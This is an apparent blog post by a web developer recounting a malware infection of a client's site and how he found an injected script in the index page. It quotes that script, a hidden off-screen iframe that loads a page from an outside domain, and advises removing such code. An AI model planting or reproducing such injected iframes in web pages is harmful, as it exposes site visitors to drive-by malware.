Last night was so weary !!, one site I worked with was attacked by malware and those who visited this site resulted hanging up their computer some lost their OS, even some says they lost their computer completely. Site owner called me and requested me to check the problem immediately. Tell you the truth, it was my first experience with malware attacks.

I started google the problem, I came to know it is easy to know which files are infected when we added site into google© Webmaster Tools. I did the same, when I completed the procedure, they asked me to add a meta tag in index page.

I've opened index file using a text editor and added the tag in the place. Before I close I checked entire file and found a script after tag. It was not familiar to me, it was something like this:

< script >document . Write(‘< iframe src=“http : // erapost . net/? click =5 8 35265” width=100 height=100 style=“position:absolute;top:-10000;left:-10000;” >< /iframe >’);< /script >< table cellpadding =‘0’ cellspacing=‘0’ width=‘100%’ >

Please do not try this script: Really dangerous one.

Remove un-friendly scripts like above, and try check. Hope it will work.



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